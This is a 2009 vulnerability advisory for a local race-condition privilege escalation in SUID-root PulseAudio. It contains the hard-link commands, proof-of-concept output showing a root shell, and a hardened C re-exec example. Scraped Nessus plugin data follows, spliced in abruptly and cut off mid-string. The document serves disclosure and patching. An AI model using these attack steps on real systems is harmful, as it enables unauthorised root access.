------------------------------------------------------------------------
PulseAudio local race condition privilege escalation vulnerability
------------------------------------------------------------------------
Yorick Koster, June 2009
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The PulseAudio binary is affected by a local race condition. If the
binary is installed as SUID root, it is possible to exploit this
vulnerability to gain root privileges. This attack requires that a local
attacker can create hard links on the same hard disk partition on which
PulseAudio is installed (i.e. /usr/bin and /tmp reside on the same
partition).
------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2009-1894 [2]
- GLSA 200907-13 [3] PulseAudio: Local privilege escalation
- USN-804-1 [4] PulseAudio vulnerability
------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was successfully verified on the following Linux
distributions:
- Ubuntu 9.04 running PulseAudio version 0.9.14
- Debian 5.0 running PulseAudio version 0.9.10
- Mandriva Linux 2009 Spring running PulseAudio version 0.9.15
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
A patch for PulseAudio was released that addresses this issue. This
patch can be obtained from the following location:

http://git.0pointer.de/?p=pulseaudio.git;a=commit;h=84200b423ebfa7e2dad9b1b65f64eac7bf3d2114

As a temporary workaround, remove the SUID bit from the PulseAudio
binary.

$ chmod u-s `which pulseaudio`
------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
PulseAudio [5] is a sound server for POSIX and Win32 systems. A sound
server is basically a proxy for your sound applications. It allows you
to do advanced operations on your sound data as it passes between your
application and your hardware.

On some systems, the PulseAudio binary is installed SUID root to enable
real-time scheduling. In that case the daemon drops root privileges
immediately on startup. It retains the CAP_SYS_NICE capability (on
systems that support it), but only if the calling user is a member of
the pulse-rt group. For all other users all capabilities are dropped
immediately.
------------------------------------------------------------------------
Race condition
------------------------------------------------------------------------
When the PulseAudio binary is started on a Linux system, it checks
whether the LD_BIND_NOW environment variable is set. If it is not,
PulseAudio sets the variable and re-executes itself. It determines its
own path name by reading the /proc/self/exe symbolic link, which points
to the full path name of the executable of the current process.

int main(int argc, char *argv[]) {
[...]
#if defined(__linux__) && defined(__OPTIMIZE__)
    /*
      Disable lazy relocations to make usage of external libraries
      more deterministic for our RT threads. We abuse __OPTIMIZE__ as
      a check whether we are a debug build or not.
    */

    if (!getenv("LD_BIND_NOW")) {
        char *rp;

        /* We have to execute ourselves, because the libc caches the
         * value of $LD_BIND_NOW on initialization. */

        pa_set_env("LD_BIND_NOW", "1");
        pa_assert_se(rp = pa_readlink("/proc/self/exe"));
        pa_assert_se(execv(rp, argv) == 0);
    }
#endif

Normally, /proc/self/exe will point to something like
/usr/bin/pulseaudio. However, by using hard links, it is possible to
cause /proc/self/exe to point to a different location.

$ cd /tmp
$ ls -la /proc/self/exe
lrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> /bin/ls
$ ln `which ls` ls
$ ./ls -la /proc/self/exe
lrwxrwxrwx 1 yorick yorick 0 2009-06-09 16:31 /proc/self/exe -> /tmp/ls

In addition, if a hard link is created, the SUID bit is preserved.

$ ln `which pulseaudio` pulseaudio
$ ls -la pulseaudio
-rwsr-xr-x 2 root root 71616 2009-04-09 02:12 pulseaudio

A race condition exists in the reload mechanism of PulseAudio. An
attacker can exploit this issue by creating a hard link pointing to the
PulseAudio binary and then executing the binary through that hard
link. At this moment /proc/self/exe will point to the hard link.
Before PulseAudio re-executes itself, the attacker can replace the hard
link with a different (executable) file or (symbolic) link. When
PulseAudio then re-executes itself, it uses a path name that at this
moment points to a different file, for example a command shell. Root
privileges are not dropped when PulseAudio is reloading, thus allowing
a local attacker to gain root privileges.

Please note, this attack is only possible if the attacker can create
hard links on the same hard disk partition on which PulseAudio is
installed (i.e. /usr/bin and /tmp reside on the same partition).
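
The re-exec step in hardened form, as an added example that is neither
PulseAudio's patch nor code from this advisory: privileges are dropped
before the exec, and the exec goes through a descriptor opened on
/proc/self/exe instead of the path name read from it. All function
names and the scratch files under /tmp are constructed for illustration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

extern char **environ;

/* Permanently return to the invoking user's identity. Written for the
 * SUID-root case of the advisory: with euid 0, setgid()/setuid() also
 * reset the saved IDs. Returns 0 on success, -1 on failure. */
int drop_privileges(void) {
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    /* Group first: once the UID is dropped the GID can no longer be changed. */
    if (setgid(rgid) != 0 || setuid(ruid) != 0) return -1;
    if (geteuid() != ruid || getegid() != rgid) return -1;
    /* A non-root caller must not be able to take root back. */
    if (ruid != 0 && setuid(0) == 0) return -1;
    return 0;
}

/* 1 if `path` currently names the file open on `fd`, 0 if it names another
 * file, -1 on error. For logging only: checking a name and then exec'ing
 * that name would reintroduce the race. */
int fd_matches_path(int fd, const char *path) {
    struct stat by_fd, by_name;
    if (fstat(fd, &by_fd) != 0 || stat(path, &by_name) != 0) return -1;
    return by_fd.st_dev == by_name.st_dev && by_fd.st_ino == by_name.st_ino;
}

/* Hardened self re-exec; returns (with -1) only on failure. */
int reexec_self(char *const argv[]) {
    /* Opening the /proc/self/exe magic link yields the running executable
     * itself, whatever its path name points to by now. */
    int fd = open("/proc/self/exe", O_RDONLY | O_CLOEXEC);
    if (fd < 0) return -1;
    /* Anything exec'ed from here on runs as the caller; the genuine SUID
     * binary gets its privileges back from its own file mode. */
    if (drop_privileges() != 0) { close(fd); return -1; }
    fexecve(fd, argv, environ);
    close(fd);
    return -1;
}

static int write_file(const char *path, const char *text) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_CLOEXEC, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, text, strlen(text));
    close(fd);
    return n == (ssize_t)strlen(text) ? 0 : -1;
}

/* Constructed demo on scratch files: returns 1 when the descriptor kept
 * the original file although its name was re-pointed at another file. */
int demo_name_vs_descriptor(void) {
    char dir[] = "/tmp/reexec-demo-XXXXXX";
    char name[PATH_MAX], other[PATH_MAX], buf[16] = {0};

    if (!mkdtemp(dir)) return -1;
    snprintf(name, sizeof name, "%s/daemon", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    if (write_file(name, "original") != 0 || write_file(other, "swapped") != 0)
        return -1;

    int fd = open(name, O_RDONLY | O_CLOEXEC);
    int before = fd_matches_path(fd, name);   /* name and descriptor agree */
    int renamed = rename(other, name);        /* name now means another file */
    int after = fd_matches_path(fd, name);    /* ... and no longer agrees */
    ssize_t n = read(fd, buf, sizeof buf - 1);

    close(fd);
    unlink(name);
    rmdir(dir);
    return before == 1 && renamed == 0 && after == 0 &&
           n == 8 && strcmp(buf, "original") == 0;
}

int main(int argc, char *argv[]) {
    (void)argc;
    if (!getenv("LD_BIND_NOW")) {             /* same trigger as in main.c */
        setenv("LD_BIND_NOW", "1", 1);
        reexec_self(argv);
        perror("re-exec failed");
        return 1;
    }
    printf("re-executed via descriptor; demo result: %d\n",
           demo_name_vs_descriptor());
    return 0;
}
```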
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept can be used to exploit this issue. The
proof of concept tries to exploit this issue by creating hard links in
the /tmp directory.
pa_race [6]
$ ./pa_race
I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.
I: caps.c: Dropping root privileges.
I: caps.c: Limited capabilities successfully to CAP_SYS_NICE.
N: main.c: Called SUID root and real-time and/or high-priority
scheduling was requested in the configuration. However, we lack the
necessary privileges:
N: main.c: We are not in group 'pulse-rt', PolicyKit refuse to
grant us the requested privileges and we have no increase
RLIMIT_NICE/RLIMIT_RTPRIO resource limits.
N: main.c: For enabling real-time/high-priority scheduling please
acquire the appropriate PolicyKit privileges, or become a member of
'pulse-rt', or increase the RLIMIT_NICE/RLIMIT_RTPRIO resource
limits for this user.
E: pid.c: Daemon already running.
E: main.c: pa_pid_file_create() failed.
[...]
uid=0(root) gid=0(root) groups=4(adm), 20(dialout), 24(cdrom),
25(floppy), 29(audio), 30(dip), 44(video), 46(plugdev), 107(fuse),
109(lpadmin), 115(admin), 1000(yorick)
#
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] http://www.akitasecurity.nl/advisory.php?id=AK20090602
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1894
[3] http://www.gentoo.org/security/en/glsa/glsa-200907-13.xml
[4] http://www.ubuntu.com/usn/usn-804-1
[5] http://pulseaudio.org/
[6] http://www.akitasecurity.nl/advisory/AK20090602/pa_race
------------------------------------------------------------------------
--
------------------------------------------------------------------------
Akita Software Security (Kvk 37144957)
http://www.akitasecurity.nl/
------------------------------------------------------------------------
Key fingerprint = 5FC0 F50C 8B3A 4A61 7A1F 2BFF 5482 D26E D890 5A65
http://keyserver.pgp.com/vkd/DownloadKey.event?keyid=0x5482D26ED8905A65
flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-bluetooth-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-gconf-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-jack-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-lirc-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-x11-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-module-zeroconf-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"pulseaudio-utils-0.9.15-2.0.6mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:07:24", "description": "The remote host is affected by the vulnerability described in GLSA-200907-13 (PulseAudio: Local privilege escalation)\n\n Tavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself. 
The vulnerability has independently been reported to oCERT by Yorick Koster.\n Impact :\n\n A local user who has write access to any directory on the file system containing /usr/bin can exploit this vulnerability using a race condition to execute arbitrary code with root privileges.\n Workaround :\n\n Ensure that the file system holding /usr/bin does not contain directories that are writable for unprivileged users.", "cvss3": {"score": null, "vector": null}, "published": "2009-07-17T00:00:00", "type": "nessus", "title": "GLSA-200907-13 : PulseAudio: Local privilege escalation", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:pulseaudio", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200907-13.NASL", "href": "https://www.tenable.com/plugins/nessus/39848", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200907-13.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39848);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"GLSA\", value:\"200907-13\");\n\n script_name(english:\"GLSA-200907-13 : PulseAudio: Local privilege escalation\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200907-13\n(PulseAudio: Local privilege escalation)\n\n Tavis Ormandy and Julien Tinnes of the Google Security Team discovered\n that the pulseaudio binary is installed setuid root, and does not drop\n privileges before re-executing itself. 
The vulnerability has\n independently been reported to oCERT by Yorick Koster.\n \nImpact :\n\n A local user who has write access to any directory on the file system\n containing /usr/bin can exploit this vulnerability using a race\n condition to execute arbitrary code with root privileges.\n \nWorkaround :\n\n Ensure that the file system holding /usr/bin does not contain\n directories that are writable for unprivileged users.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200907-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PulseAudio users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/pulseaudio-0.9.9-r54'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-sound/pulseaudio\", unaffected:make_list(\"ge 0.9.9-r54\"), vulnerable:make_list(\"lt 0.9.9-r54\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PulseAudio\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:07:07", "description": "Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that PulseAudio did not safely re-execute itself. A local attacker could exploit this to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2009-07-17T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 8.10 / 9.04 : pulseaudio vulnerability (USN-804-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0", "p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulse-dev", "p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0", "p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulse0", "p-cpe:/a:canonical:ubuntu_linux:libpulse0-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore5", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore5-dbg", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore9", "p-cpe:/a:canonical:ubuntu_linux:libpulsecore9-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf-dbg", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils", "p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils-dbg", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", 
"cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04"], "id": "UBUNTU_USN-804-1.NASL", "href": "https://www.tenable.com/plugins/nessus/39851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-804-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39851);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-1894\");\n script_xref(name:\"USN\", value:\"804-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 8.10 / 9.04 : pulseaudio vulnerability (USN-804-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Tavis Ormandy, Julien Tinnes, and Yorick Koster discovered that\nPulseAudio did not safely re-execute itself. A local attacker could\nexploit this to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/804-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-browse0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse-mainloop-glib0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulse0-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpulsecore9-dbg\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-esound-compat-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-gconf-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-hal-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-lirc-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-x11-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-module-zeroconf-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pulseaudio-utils-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-dev\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse0\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulse0-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulsecore5\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpulsecore5-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-esound-compat\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-esound-compat-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-gconf\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-gconf-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-hal\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif 
(ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-hal-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-lirc\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-lirc-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-x11\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-x11-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-zeroconf\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-module-zeroconf-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-utils\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pulseaudio-utils-dbg\", pkgver:\"0.9.10-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-browse0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-browse0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-dev\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-mainloop-glib0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse-mainloop-glib0-dbg\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse0\", pkgver:\"0.9.10-2ubuntu9.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpulse0-dbg\", 